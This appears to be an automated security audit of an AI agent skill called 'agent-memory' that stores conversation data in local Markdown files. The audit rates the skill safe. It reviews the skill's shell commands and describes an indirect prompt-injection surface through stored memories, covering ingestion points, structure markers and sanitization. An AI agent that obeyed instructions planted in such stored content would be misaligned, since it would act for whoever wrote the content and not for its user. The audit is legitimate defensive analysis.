agent-memory
Pass
Audited by Gen Agent Trust Hub on Mar 1, 2026
Risk Level: SAFE
Full Analysis
- [COMMAND_EXECUTION]: The skill utilizes common shell utilities including
ls,rg,mkdir,cat,trash, andrmdirto manage a local memory store. All operations are explicitly targeted at a sub-directory within the skill's own folder structure (.claude/skills/agent-memory/memories/), which limits the potential impact of these commands. The use of single-quoted heredocs (<< 'EOF') in thecatcommand is a security best practice that prevents shell expansion of any special characters or variables contained within the data being saved. - [PROMPT_INJECTION]: The skill establishes a mechanism for storing and retrieving content from conversations, creating an indirect prompt injection surface.
- Ingestion points: User-provided or research-derived data is written to Markdown files in the
memories/directory via thecatcommand. - Boundary markers: The skill uses YAML frontmatter (with fields like
summaryandtags) and Markdown headers to provide structure to the saved data. - Capability inventory: The agent can search (
rg), list (ls), read (cat), and delete (trash) these files. - Sanitization: While the skill provides guidelines for the agent (e.g., using kebab-case for filenames), it relies on the agent's internal logic to sanitize content and paths. The use of structured YAML and Markdown helps the agent distinguish between metadata and the actual memory content, reducing the risk of accidental instruction obedience.
Audit Metadata